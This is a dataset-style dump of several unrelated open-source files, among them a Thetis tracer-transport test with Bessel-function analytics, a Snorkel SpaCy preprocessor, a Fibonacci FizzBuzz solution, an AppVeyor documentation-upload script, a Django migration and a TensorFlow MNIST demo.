workflow_step_edit_id: str,
inputs: dict = None,
outputs: list = None,
**kwargs
) -> Union[Future, SlackResponse]:
"""Update the configuration for a workflow extension step.
Args:
workflow_step_edit_id (str): A unique identifier of the workflow step to be updated.
e.g. 'add_task'
inputs (dict): A key-value object of inputs required from a user during step configuration.
e.g. { 'title': { 'value': 'The Title' }, 'submitter': { 'value': 'The Submitter' } }
outputs (list): A list of output objects used during step execution.
e.g. [{ 'type': 'text', 'name': 'title', 'label': 'Title' }]
"""
kwargs.update({"workflow_step_edit_id": workflow_step_edit_id})
if inputs:
kwargs.update({"inputs": inputs})
if outputs:
kwargs.update({"outputs": outputs})
return self.api_call("workflows.updateStep", json=kwargs)
| 40.293881
| 125
| 0.605527
|
acff731be2acac769c0dceac6f639223feeb6377
| 14,175
|
py
|
Python
|
test/tracerEq/test_point_discharge.py
|
thetisproject/cofs
|
42dccc62a9cbdfd3103031df6144de207b32189e
|
[
"MIT"
] | null | null | null |
test/tracerEq/test_point_discharge.py
|
thetisproject/cofs
|
42dccc62a9cbdfd3103031df6144de207b32189e
|
[
"MIT"
] | null | null | null |
test/tracerEq/test_point_discharge.py
|
thetisproject/cofs
|
42dccc62a9cbdfd3103031df6144de207b32189e
|
[
"MIT"
] | null | null | null |
"""
TELEMAC-2D `Point Discharge with Diffusion' test case
=====================================================
Solves a steady-state tracer advection equation in a
rectangular domain with uniform fluid velocity, constant
diffusivity and a constant tracer source term. Neumann
conditions are imposed on the channel walls, an inflow
condition is imposed on the left-hand boundary, and the
right-hand boundary remains open. An analytical solution
involving modified Bessel functions exists [1].
The two different functional quantities of interest considered
in [2] are evaluated on each mesh and convergence is assessed.
A Gaussian parametrisation for the point source is adopted,
with the radius calibrated using gradient-based optimisation.
Further details for the test case can be found in [1].
[1] A. Riadh, G. Cedric, M. Jean, "TELEMAC modeling system:
2D hydrodynamics TELEMAC-2D software release 7.0 user
manual." Paris: R&D, Electricite de France, p. 134
(2014).
[2] J.G. Wallwork, N. Barral, D.A. Ham, M.D. Piggott,
"Goal-Oriented Error Estimation and Mesh Adaptation for
Tracer Transport Modelling", submitted to Computer
Aided Design (2021).
[3] B.P. Flannery, W.H. Press, S.A. Teukolsky, W. Vetterling,
"Numerical recipes in C", Press Syndicate of the University
of Cambridge, New York (1992).
"""
from thetis import *
import thetis.diagnostics as diagnostics
import pytest
def bessi0(x):
    """
    Modified Bessel function of the first kind. Code taken from [3].

    Implemented with UFL operators (``abs``, ``exp``, ``conditional``, ...)
    so that it can appear inside finite element expressions; it cannot be
    evaluated with Python floats directly.
    """
    ax = abs(x)
    # Series approximation for |x| <= 3.75 (coefficients from Numerical Recipes).
    y1 = x/3.75
    y1 *= y1
    expr1 = 1.0 + y1*(3.5156229 + y1*(3.0899424 + y1*(1.2067492 + y1*(
        0.2659732 + y1*(0.360768e-1 + y1*0.45813e-2)))))
    # Asymptotic expansion for |x| > 3.75.
    y2 = 3.75/ax
    expr2 = exp(ax)/sqrt(ax)*(0.39894228 + y2*(0.1328592e-1 + y2*(
        0.225319e-2 + y2*(-0.157565e-2 + y2*(0.916281e-2 + y2*(
            -0.2057706e-1 + y2*(0.2635537e-1 + y2*(-0.1647633e-1 + y2*0.392377e-2))))))))
    # Branch selection must be symbolic; a Python `if` cannot act on UFL values.
    return conditional(le(ax, 3.75), expr1, expr2)
def bessk0(x):
    """
    Modified Bessel function of the second kind. Code taken from [3].

    Like :func:`bessi0`, this builds a UFL expression; note it calls
    ``bessi0`` in the small-argument branch.
    """
    # Series approximation for x <= 2 (uses bessi0).
    y1 = x*x/4.0
    expr1 = -ln(x/2.0)*bessi0(x) + (-0.57721566 + y1*(0.42278420 + y1*(
        0.23069756 + y1*(0.3488590e-1 + y1*(0.262698e-2 + y1*(0.10750e-3 + y1*0.74e-5))))))
    # Asymptotic expansion for x > 2.
    y2 = 2.0/x
    expr2 = exp(-x)/sqrt(x)*(1.25331414 + y2*(-0.7832358e-1 + y2*(0.2189568e-1 + y2*(
        -0.1062446e-1 + y2*(0.587872e-2 + y2*(-0.251540e-2 + y2*0.53208e-3))))))
    return conditional(ge(x, 2), expr2, expr1)
class PointDischargeParameters(object):
    """
    Problem parameter class, including point source representation.
    Delta functions are difficult to represent in numerical models. Here we
    use a Gaussian approximation with a small radius. The small radius has
    been calibrated against the analytical solution. See [2] for details.
    """
    def __init__(self, offset, tracer_element_family):
        self.offset = offset
        # Physical parameters
        self.diffusivity = Constant(0.1)
        self.viscosity = None
        self.drag = Constant(0.0025)
        self.uv = Constant(as_vector([1.0, 0.0]))
        self.elev = Constant(0.0)
        # Parametrisation of point source. The radius was calibrated
        # separately for each element family (see class docstring).
        self.source_x, self.source_y = 2.0, 5.0
        self.source_r = 0.05606298 if tracer_element_family == 'dg' else 0.05606388
        self.source_value = 100.0
        # Specification of receiver region: offset=True shifts it off the
        # flow centreline in the positive y-direction.
        self.receiver_x = 20.0
        self.receiver_y = 7.5 if self.offset else 5.0
        self.receiver_r = 0.5
        # Boundary conditions (keys are boundary markers of the rectangle mesh)
        self.boundary_conditions = {
            'tracer': {
                1: {'value': Constant(0.0)},  # inflow
                # outflow -> natural BC
            },
            'shallow_water': {
                1: {
                    'uv': Constant(as_vector([1.0, 0.0])),
                    'elev': Constant(0.0)
                },  # inflow
                2: {
                    'uv': Constant(as_vector([1.0, 0.0])),
                    'elev': Constant(0.0)
                },  # outflow
            }
        }
    def ball(self, mesh, scaling=1.0, eps=1.0e-10):
        """Indicator function of the circular receiver region (UFL expression)."""
        x, y = SpatialCoordinate(mesh)
        # eps guards against points exactly on the circle being excluded.
        expr = lt((x-self.receiver_x)**2 + (y-self.receiver_y)**2, self.receiver_r**2 + eps)
        return conditional(expr, scaling, 0.0)
    def gaussian(self, mesh, scaling=1.0):
        """Gaussian bump centred at the point source (UFL expression)."""
        x, y = SpatialCoordinate(mesh)
        expr = exp(-((x-self.source_x)**2 + (y-self.source_y)**2)/self.source_r**2)
        return scaling*expr
    def source(self, fs):
        """Tracer source term: a scaled Gaussian approximating a delta function."""
        return self.gaussian(fs.mesh(), scaling=self.source_value)
    def bathymetry(self, fs):
        """Constant bathymetry of 5m over the whole domain."""
        return Function(fs).assign(5.0)
    def quantity_of_interest_kernel(self, mesh):
        """Receiver indicator, rescaled so its discrete area matches pi*r^2."""
        area = assemble(self.ball(mesh)*dx)
        area_analytical = pi*self.receiver_r**2
        # Guard against a mesh too coarse to resolve the receiver at all.
        scaling = 1.0 if numpy.allclose(area, 0.0) else area_analytical/area
        return self.ball(mesh, scaling=scaling)
    def quantity_of_interest_form(self, sol):
        """UFL form of the QoI: integral of the tracer over the receiver."""
        kernel = self.quantity_of_interest_kernel(sol.function_space().mesh())
        # High quadrature degree because the kernel is discontinuous.
        return inner(kernel, sol)*dx(degree=12)
    def quantity_of_interest(self, sol):
        """Evaluate the QoI for a given tracer solution."""
        return assemble(self.quantity_of_interest_form(sol))
    def analytical_quantity_of_interest(self, mesh):
        """
        The analytical solution can be found in [1]. Due to the modified
        Bessel function, it cannot be evaluated exactly and instead must
        be computed using a quadrature rule.
        """
        x, y = SpatialCoordinate(mesh)
        x0, y0 = self.source_x, self.source_y
        u = self.uv[0]
        D = self.diffusivity
        Pe = 0.5*u/D  # Mesh Peclet number
        r = sqrt((x-x0)*(x-x0) + (y-y0)*(y-y0))
        r = max_value(r, self.source_r)  # (Bessel fn explodes at (x0, y0))
        sol = 0.5/(pi*D)*exp(Pe*(x-x0))*bessk0(Pe*r)
        kernel = self.quantity_of_interest_kernel(mesh)
        return assemble(kernel*sol*dx(degree=12))
def solve_tracer(mesh2d, offset, hydrodynamics=False, solve_adjoint=False, **model_options):
    """
    Solve the `Point Discharge with Diffusion' steady-state tracer transport
    test case from [1]. This problem has a source term, which involves a
    Dirac delta function. It also has an analytical solution, which may be
    expressed in terms of modified Bessel functions.
    As in [2], convergence of two diagnostic quantities of interest is
    assessed. These are simple integrals of the tracer concentration over
    circular 'receiver' regions. The 'aligned' receiver is directly downstream
    in the flow and the 'offset' receiver is shifted in the positive y-direction.
    :arg mesh2d: mesh upon which to solve the tracer transport problem.
    :arg offset: toggle between aligned and offset source/receiver.
    :kwarg hydrodynamics: solve shallow water equations?
    :kwarg solve_adjoint: solve the adjoint problem as well as the forward one?
    :return: the tracer field, or ``(solver_obj, adjoint_solution)`` when
        ``solve_adjoint`` is True.
    """
    P1_2d = FunctionSpace(mesh2d, "CG", 1)
    # Set up parameter class
    tracer_element_family = model_options.get("tracer_element_family", "cg")
    params = PointDischargeParameters(offset, tracer_element_family)
    source = params.source(P1_2d)
    # Solve tracer transport problem
    solver_obj = solver2d.FlowSolver2d(mesh2d, params.bathymetry(P1_2d))
    options = solver_obj.options
    options.swe_timestepper_type = 'SteadyState'
    options.tracer_timestepper_type = 'SteadyState'
    options.tracer_element_family = tracer_element_family
    # Steady state: a single (pseudo-)timestep covering the whole simulation.
    options.timestep = 20.0
    options.simulation_end_time = 18.0
    options.simulation_export_time = 18.0
    # Direct solves via MUMPS for both subsystems.
    options.swe_timestepper_options.solver_parameters['pc_factor_mat_solver_type'] = 'mumps'
    options.swe_timestepper_options.solver_parameters['snes_monitor'] = None
    options.tracer_timestepper_options.solver_parameters['pc_factor_mat_solver_type'] = 'mumps'
    options.tracer_timestepper_options.solver_parameters['snes_monitor'] = None
    options.fields_to_export = ['tracer_2d', 'uv_2d', 'elev_2d']
    # Hydrodynamics
    options.element_family = 'dg-dg'
    options.horizontal_viscosity = params.viscosity
    options.quadratic_drag_coefficient = params.drag
    options.use_lax_friedrichs_velocity = True
    options.lax_friedrichs_velocity_scaling_factor = Constant(1.0)
    # Passive tracer
    options.add_tracer_2d('tracer_2d', 'Depth averaged tracer', 'Tracer2d',
                          diffusivity=params.diffusivity, source=source)
    options.horizontal_velocity_scale = Constant(1.0)
    options.horizontal_diffusivity_scale = Constant(0.0)
    options.tracer_only = not hydrodynamics
    # Stabilisation depends on the element family: SUPG for CG,
    # Lax-Friedrichs fluxes and slope limiting for DG.
    options.use_supg_tracer = tracer_element_family == 'cg'
    options.use_lax_friedrichs_tracer = tracer_element_family == 'dg'
    options.lax_friedrichs_tracer_scaling_factor = Constant(1.0)
    options.use_limiter_for_tracers = tracer_element_family == 'dg'
    # Caller-provided options override everything set above.
    options.update(model_options)
    # Initial and boundary conditions
    solver_obj.bnd_functions = params.boundary_conditions
    # Near-zero initial velocity when hydrodynamics are solved, so the SWE
    # solve is not started from the exact boundary value.
    uv_init = Constant(as_vector([1.0e-08, 0.0])) if hydrodynamics else params.uv
    solver_obj.assign_initial_conditions(tracer=source, uv=uv_init, elev=params.elev)
    # Solve
    solver_obj.iterate()
    c_2d = solver_obj.fields.tracer_2d
    if not solve_adjoint:
        return c_2d
    # Solve adjoint problem: discrete adjoint of the tracer residual F with
    # the QoI derivative as right-hand side.
    J = params.quantity_of_interest_form(c_2d)
    F = solver_obj.timestepper.timesteppers["tracer_2d"].F
    Q_2d = solver_obj.function_spaces.Q_2d
    adj_sol = Function(Q_2d)
    dFdc = derivative(F, c_2d, TrialFunction(Q_2d))
    dFdc_transpose = adjoint(dFdc)
    dJdc = derivative(J, c_2d, TestFunction(Q_2d))
    solve(dFdc_transpose == dJdc, adj_sol)
    return solver_obj, adj_sol
def run_convergence(offset, num_levels=3, plot=False, **kwargs):
    """
    Assess convergence of the quantity of interest with increasing DoF count.
    :arg offset: toggle between aligned and offset source/receiver.
    :kwarg num_levels: number of uniform refinements to consider.
    :kwarg plot: toggle plotting of convergence curves.
    :kwargs: other kwargs are passed to `solve_tracer`.
    :raises AssertionError: if the observed convergence rate is below 0.9.
    """
    J = []
    dof_count = []
    tracer_element_family = kwargs.get('tracer_element_family')
    params = PointDischargeParameters(offset, tracer_element_family)
    # Run model on a sequence of uniform meshes and compute QoI error
    for n in range(num_levels):
        mesh2d = RectangleMesh(100*2**n, 20*2**n, 50, 10)
        sol = solve_tracer(mesh2d, offset, **kwargs)
        J.append(params.quantity_of_interest(sol))
        dof_count.append(sol.function_space().dof_count)
    # Reference value evaluated on the finest mesh (last `sol` of the loop).
    J_analytical = params.analytical_quantity_of_interest(sol.function_space().mesh())
    relative_error = numpy.abs((numpy.array(J) - J_analytical)/J_analytical)
    # Plot convergence curves
    if plot:
        import matplotlib.pyplot as plt
        fig, axes = plt.subplots()
        axes.loglog(dof_count, relative_error, '--x')
        axes.set_xlabel("DoF count")
        axes.set_ylabel("QoI error")
        axes.grid(True)
        alignment = 'offset' if offset else 'aligned'
        fname = f"steady_state_convergence_{alignment}_{tracer_element_family}.png"
        plot_dir = create_directory(os.path.join(os.path.dirname(__file__), 'outputs'))
        plt.savefig(os.path.join(plot_dir, fname))
    # Check for linear convergence: slope of the log-log error curve between
    # the coarsest and finest levels.
    delta_y = numpy.log10(relative_error[-1]) - numpy.log10(relative_error[0])
    delta_x = numpy.log10(dof_count[-1]) - numpy.log10(dof_count[0])
    rate = abs(delta_y/delta_x)
    assert rate > 0.9, f"Sublinear convergence rate {rate:.4f}"
def estimate_error(mesh, offset, **model_options):
    """
    Estimate the QoI error using a dual weighted residual (DWR) indicator.
    Forward and adjoint problems are solved on a mesh and its uniform
    refinement; the difference of the two adjoint solutions weights the
    forward residual.
    :arg mesh: base mesh.
    :arg offset: toggle between aligned and offset source/receiver.
    :kwargs: passed through to `solve_tracer` (``solve_adjoint`` is forced on).
    :return: tuple of (forward solution, adjoint solution, error indicator).
    """
    model_options["solve_adjoint"] = True
    # Create a two level mesh hierarchy
    mesh0, mesh1 = MeshHierarchy(mesh, 1)
    tm = TransferManager()
    # Solve both forward and adjoint on both meshes
    solver_obj, a0 = solve_tracer(mesh0, offset, **model_options)
    f0 = solver_obj.fields.tracer_2d
    P0 = solver_obj.function_spaces.P0_2d
    solver_obj, a1 = solve_tracer(mesh1, offset, **model_options)
    # Approximate adjoint error: fine adjoint minus coarse adjoint
    # prolonged onto the fine space.
    Q1 = solver_obj.function_spaces.Q_2d
    a0plg = Function(Q1)
    tm.prolong(a0, a0plg)
    a1err = Function(Q1).assign(a1 - a0plg)
    # Compute dual weighted residual
    ei = diagnostics.TracerDualWeightedResidual2D(solver_obj, a1err)
    ei.solve()
    # Project down to base space and take elementwise magnitudes
    error = Function(P0, name="Error indicator")
    error.project(ei.error)
    error.interpolate(abs(error))
    # Plot
    if not model_options.get("no_exports", False):
        File("outputs/forward.pvd").write(f0)
        a0.rename("Adjoint solution")
        File("outputs/adjoint.pvd").write(a0)
        File("outputs/error.pvd").write(error)
    return f0, a0, error
# ---------------------------
# standard tests for pytest
# ---------------------------
@pytest.fixture(params=['dg', 'cg'])
def family(request):
    """Tracer finite element family to parametrise the tests over."""
    return request.param
@pytest.fixture(params=[False, True], ids=["aligned", "offset"])
def offset(request):
    """Whether the receiver is offset from the flow centreline."""
    return request.param
def test_hydrodynamics(offset, family):
    """
    Test that we can solve the coupled system
    on a coarse mesh.
    """
    # Smoke test only: no assertion beyond "the solve completes".
    mesh2d = RectangleMesh(100, 20, 50, 10)
    solve_tracer(mesh2d, offset, tracer_element_family=family,
                 no_exports=True)
def test_convergence(offset, family):
    """
    Test that the quantity of interest converges
    linearly with uniform mesh refinement.
    """
    # The assertion lives inside run_convergence (rate > 0.9).
    run_convergence(offset, tracer_element_family=family,
                    no_exports=True)
def test_dwr(offset, family):
    """
    Test that we can successfully compute dual
    weighted residual contributions.
    """
    # Smoke test for the adjoint solve and DWR error indicator pipeline.
    mesh2d = RectangleMesh(100, 20, 50, 10)
    estimate_error(mesh2d, offset, tracer_element_family=family,
                   no_exports=True)
# ---------------------------
# run individual setup for debugging
# ---------------------------
if __name__ == "__main__":
    # Debugging entry point: run the offset CG configuration on the coarsest
    # mesh and write VTK output to the outputs/ directory.
    n = 0
    mesh2d = RectangleMesh(100*2**n, 20*2**n, 50, 10)
    estimate_error(mesh2d, True, tracer_element_family="cg", no_exports=False)
| 37.90107
| 95
| 0.66455
|
acff742776cadacab0bef2970536c500fe687204
| 2,706
|
py
|
Python
|
snorkel/preprocess/nlp.py
|
ptrcklv/snorkel
|
03e4b756cd72433055bcd14e0ceb151a7fa6f393
|
[
"Apache-2.0"
] | 1
|
2020-06-06T05:04:12.000Z
|
2020-06-06T05:04:12.000Z
|
snorkel/preprocess/nlp.py
|
ptrcklv/snorkel
|
03e4b756cd72433055bcd14e0ceb151a7fa6f393
|
[
"Apache-2.0"
] | null | null | null |
snorkel/preprocess/nlp.py
|
ptrcklv/snorkel
|
03e4b756cd72433055bcd14e0ceb151a7fa6f393
|
[
"Apache-2.0"
] | 1
|
2021-04-25T21:19:21.000Z
|
2021-04-25T21:19:21.000Z
|
from typing import List, Optional
import spacy
from snorkel.types import FieldMap
from .core import BasePreprocessor, Preprocessor
EN_CORE_WEB_SM = "en_core_web_sm"
class SpacyPreprocessor(Preprocessor):
    """Preprocessor that parses input text via a SpaCy model.
    A common approach to writing LFs over text is to first use
    a natural language parser to decompose the text into tokens,
    part-of-speech tags, etc. SpaCy (https://spacy.io/) is a
    popular tool for doing this. This preprocessor adds a
    SpaCy ``Doc`` object to the data point. A ``Doc`` object is
    a sequence of ``Token`` objects, which contain information
    on lemmatization, parts-of-speech, etc. ``Doc`` objects also
    contain fields like ``Doc.ents``, a list of named entities,
    and ``Doc.noun_chunks``, a list of noun phrases. For details
    of SpaCy ``Doc`` objects and a full attribute listing,
    see https://spacy.io/api/doc.
    Parameters
    ----------
    text_field
        Name of data point text field to input
    doc_field
        Name of data point field to output parsed document to
    language
        SpaCy model to load
        See https://spacy.io/usage/models#usage
    disable
        List of pipeline components to disable
        See https://spacy.io/usage/processing-pipelines#disabling
    pre
        Preprocessors to run before this preprocessor is executed
    memoize
        Memoize preprocessor outputs?
    gpu
        Prefer Spacy GPU processing?
    """
    def __init__(
        self,
        text_field: str,
        doc_field: str,
        language: str = EN_CORE_WEB_SM,
        disable: Optional[List[str]] = None,
        pre: Optional[List[BasePreprocessor]] = None,
        memoize: bool = False,
        gpu: bool = False,
    ) -> None:
        # Use the concrete subclass name so subclasses report themselves.
        name = type(self).__name__
        super().__init__(
            name,
            field_names=dict(text=text_field),
            mapped_field_names=dict(doc=doc_field),
            pre=pre,
            memoize=memoize,
        )
        self.gpu = gpu
        if self.gpu:
            # Must be requested before the model is loaded to take effect.
            spacy.prefer_gpu()
        self._nlp = spacy.load(language, disable=disable or [])
    def run(self, text: str) -> FieldMap:  # type: ignore
        """Run the SpaCy model on input text.
        Parameters
        ----------
        text
            Text of document to parse
        Returns
        -------
        FieldMap
            Dictionary with a single key (``"doc"``), mapping to the
            parsed SpaCy ``Doc`` object
        """
        # Note: not trying to add the fields of `Doc` to top-level
        # as most are Cython property methods computed on the fly.
        return dict(doc=self._nlp(text))
| 31.103448
| 68
| 0.619734
|
acff746704263048475ba36e84be02f7ee47bd0c
| 580
|
py
|
Python
|
7kyu/fibonacci-fizzbuzz/fibonacci_fizzbuzz.py
|
seattlechem/codewars
|
885293e7ad5fb427c07792ed85d74881a5ebad29
|
[
"MIT"
] | null | null | null |
7kyu/fibonacci-fizzbuzz/fibonacci_fizzbuzz.py
|
seattlechem/codewars
|
885293e7ad5fb427c07792ed85d74881a5ebad29
|
[
"MIT"
] | null | null | null |
7kyu/fibonacci-fizzbuzz/fibonacci_fizzbuzz.py
|
seattlechem/codewars
|
885293e7ad5fb427c07792ed85d74881a5ebad29
|
[
"MIT"
] | null | null | null |
"""Fibonacci fizz buzz."""
def fibs_fizz_buzz(k):
    """Return the first *k* Fibonacci numbers with FizzBuzz substitution.

    Multiples of 15 become 'FizzBuzz', multiples of 5 become 'Buzz' and
    multiples of 3 become 'Fizz'; every other Fibonacci number is kept as
    an int. The sequence starts 1, 1, 2, 3, 5, ...

    A non-positive *k* yields an empty list. (The original implementation
    returned a bogus slice such as ``[1]`` for negative *k*, because
    ``res[:k]`` with k < 0 slices from the end of the seed list.)
    """
    if k <= 0:
        return []
    # Build the first k Fibonacci numbers, then trim (handles k == 1).
    fibs = [1, 1]
    while len(fibs) < k:
        fibs.append(fibs[-1] + fibs[-2])
    fibs = fibs[:k]

    def _label(n):
        """Map one Fibonacci number to its FizzBuzz label (or itself)."""
        # Check divisibility by 15 first: it subsumes both 3 and 5.
        if n % 15 == 0:
            return 'FizzBuzz'
        if n % 5 == 0:
            return 'Buzz'
        if n % 3 == 0:
            return 'Fizz'
        return n

    return [_label(n) for n in fibs]
| 25.217391
| 56
| 0.439655
|
acff748a7488717dc07c5411d1e150adca94721e
| 2,920
|
py
|
Python
|
tools/ci/upload-gh-pages.py
|
mge-engine/mge
|
e7a6253f99dd640a655d9a80b94118d35c7d8139
|
[
"MIT"
] | null | null | null |
tools/ci/upload-gh-pages.py
|
mge-engine/mge
|
e7a6253f99dd640a655d9a80b94118d35c7d8139
|
[
"MIT"
] | 91
|
2019-03-09T11:31:29.000Z
|
2022-02-27T13:06:06.000Z
|
tools/ci/upload-gh-pages.py
|
mge-engine/mge
|
e7a6253f99dd640a655d9a80b94118d35c7d8139
|
[
"MIT"
] | null | null | null |
# mge - Modern Game Engine
# Copyright (c) 2021 by Alexander Schroeder
# All rights reserved.
import sys
import os
import subprocess
import shutil
# Branches whose generated documentation is published to gh-pages.
upload_branches = ["main"]
# CI metadata, read once from the environment. Empty string when a variable
# is absent (e.g. when running outside AppVeyor). The original emulated
# this with bare ``try/except`` blocks, which silently swallowed every
# possible error rather than just a missing variable.
branch = os.environ.get("APPVEYOR_REPO_BRANCH", "")
pull_request_number = os.environ.get("APPVEYOR_PULL_REQUEST_NUMBER", "")
# Commit message used when pushing the regenerated documentation.
message = "Update gh-pages from generated documentation"
def upload_enabled():
    """Return True when this CI run should publish documentation.

    Uploads happen only for direct commits (not pull requests) to one of
    the branches listed in ``upload_branches``. Reads the module-level
    ``branch`` and ``pull_request_number`` globals populated from the
    AppVeyor environment at import time.
    """
    # The original wrapped this in a bare ``except:`` (re-reading the
    # environment); that hid real errors and duplicated the env lookup.
    if pull_request_number != "":
        print("Commit is a pull request, not uploading", flush=True)
        return False
    if branch in upload_branches:
        print("Branch is %s, upload enabled" % branch, flush=True)
        return True
    return False
def upload_enabled_special_commit():
    """Return True when the commit message requests a gh-pages update.

    Any commit whose message contains the phrase "update gh-pages" forces
    a documentation upload, regardless of branch.
    """
    commit_message = os.environ.get("APPVEYOR_REPO_COMMIT_MESSAGE", "")
    if "update gh-pages" in commit_message:
        # NOTE: the original also assigned ``branch = "main"`` here, but
        # without a ``global`` statement that only bound a dead local name;
        # the caller already passes "main" to upload() explicitly.
        print("Updating gh-pages due to special commit message", flush=True)
        return True
    return False
def upload_enabled_sys_argv():
    """Return True when a ``-f`` (force) flag was passed on the command line."""
    # Explicit length check replaces the original bare ``except:`` that was
    # only meant to absorb the IndexError from a missing argument.
    if len(sys.argv) > 1 and sys.argv[1] == '-f':
        # NOTE: the original also assigned ``branch = "main"`` here; without
        # a ``global`` statement that was a dead local binding (the caller
        # passes "main" to upload() itself).
        print("Updating gh-pages due to force flag", flush=True)
        return True
    return False
def copy2_verbose(src, dst):
    """Log the file being copied, then copy it with metadata preserved."""
    notice = "Copying {0}".format(src)
    print(notice, flush=True)
    shutil.copy2(src, dst)
def upload(branch):
if os.path.exists("gh-pages"):
print("Remove old gh-pages directory", flush=True)
subprocess.run(["rd", "/s", "/q", "gh-pages"], shell=True)
print("Cloning gh-pages branch", flush=True)
subprocess.run(["git", "clone", "-q", "--branch=gh-pages",
"https://github.com/mge-engine/mge.git", "gh-pages"], shell=True)
print("Remove old files", flush=True)
subprocess.run(["git", "rm", "-rf", branch +
"/manual-html"], cwd="gh-pages")
subprocess.run(["dir", "..\\docsrc\\manual\\manual-html"],
shell=True, cwd="gh-pages")
shutil.copytree("docsrc/manual/manual-html",
"gh-pages/" + branch + "/manual-html", copy_function=copy2_verbose)
print("Adding files to git", flush=True)
subprocess.run(
["git", "add", branch + "/manual-html"], cwd="gh-pages")
print("Commit git changes", flush=True)
subprocess.run(["git", "commit", "-m", message], cwd="gh-pages")
subprocess.run(["git", "push", "origin"], cwd="gh-pages")
try:
if upload_enabled():
upload(branch)
elif upload_enabled_special_commit() or upload_enabled_sys_argv():
upload("main")
else:
print("No upload to gh-pages from this build")
except:
print("Exception %s" % str(sys.exc_info()))
sys.exit(1)
sys.exit(0)
| 29.2
| 87
| 0.605479
|
acff75c66dc0291ebb77a69f553401a961a93d46
| 1,284
|
py
|
Python
|
careplus/feeds/migrations/0001_initial.py
|
stemado/satb
|
7ef5698db8125072e3609da3766d3e80feff6e40
|
[
"MIT"
] | null | null | null |
careplus/feeds/migrations/0001_initial.py
|
stemado/satb
|
7ef5698db8125072e3609da3766d3e80feff6e40
|
[
"MIT"
] | 8
|
2020-03-24T15:42:15.000Z
|
2022-01-13T00:44:54.000Z
|
careplus/feeds/migrations/0001_initial.py
|
stemado/satb
|
7ef5698db8125072e3609da3766d3e80feff6e40
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2017-07-27 13:23
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Feed',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateTimeField(auto_now_add=True)),
('post', models.TextField(max_length=255)),
('likes', models.IntegerField(default=0)),
('comments', models.IntegerField(default=0)),
('parent', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='feeds.Feed')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'Feeds',
'verbose_name': 'Feed',
'ordering': ('-date',),
},
),
]
| 34.702703
| 131
| 0.596573
|
acff768325f8693fef608a5c9c7df6b23d2eb479
| 3,144
|
py
|
Python
|
MNIST_tf_demo.py
|
RodericDay/fix-the-sky
|
907059d230bb9d7d96eee725aa0a6d73d5fafc89
|
[
"MIT"
] | null | null | null |
MNIST_tf_demo.py
|
RodericDay/fix-the-sky
|
907059d230bb9d7d96eee725aa0a6d73d5fafc89
|
[
"MIT"
] | 1
|
2017-08-26T18:30:04.000Z
|
2017-08-26T18:30:04.000Z
|
MNIST_tf_demo.py
|
RodericDay/fix-the-sky
|
907059d230bb9d7d96eee725aa0a6d73d5fafc89
|
[
"MIT"
] | null | null | null |
import tensorflow as tf
import numpy as np
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets('MNIST_data', one_hot = True)
def main():
print('MNIST')
sess = tf.InteractiveSession()
#placeholders
x = tf.placeholder(tf.float32, shape=[None,784])
y_ = tf.placeholder(tf.float32, shape=[None,10])
#variables
W=tf.Variable(tf.zeros([784,10]))
b = tf.Variable(tf.zeros([10]))
sess.run(tf.global_variables_initializer())
y = tf.matmul(x,W) + b
#loss fnc
cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits = y))
train_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)
for _ in range(1000):
batch = mnist.train.next_batch(100)
train_step.run(feed_dict={x: batch[0], y_: batch[1]})
correct_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction,tf.float32))
print(accuracy.eval(feed_dict={x:mnist.test.images, y_: mnist.test.labels}))
#convNN
W_conv1 = weight_variable([5,5,1,32])
b_conv1 = bias_variable([32])
x_image = tf.reshape(x,[-1,28,28,1])
h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)
h_pool1 = max_pool_2x2(h_conv1)
W_conv2 = weight_variable([5, 5, 32, 64])
b_conv2 = bias_variable([64])
h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)
h_pool2 = max_pool_2x2(h_conv2)
W_fc1 = weight_variable([7 * 7 * 64, 1024])
b_fc1 = bias_variable([1024])
h_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64])
h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)
keep_prob = tf.placeholder(tf.float32)
h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)
W_fc2 = weight_variable([1024,10])
b_fc2 = bias_variable([10])
y_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2
cross_entropy = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y_conv))
train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)
correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
for i in range(20000):
batch = mnist.train.next_batch(50)
if i % 100 == 0:
train_accuracy = accuracy.eval(feed_dict={
x: batch[0], y_: batch[1], keep_prob: 1.0})
print('step %d, training accuracy %g' % (i, train_accuracy))
train_step.run(feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})
print('test accuracy %g' % accuracy.eval(feed_dict={
x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0}))
def weight_variable(shape):
initial = tf.truncated_normal(shape, stddev = 0.1)
return tf.Variable(initial)
def bias_variable(shape):
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial)
def conv2d(x,W):
return tf.nn.conv2d(x,W,strides=[1,1,1,1], padding='SAME')
def max_pool_2x2(x):
return tf.nn.max_pool(x, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')
if __name__ == "__main__":
print('heerrrooo')
main()
| 28.581818
| 96
| 0.69243
|
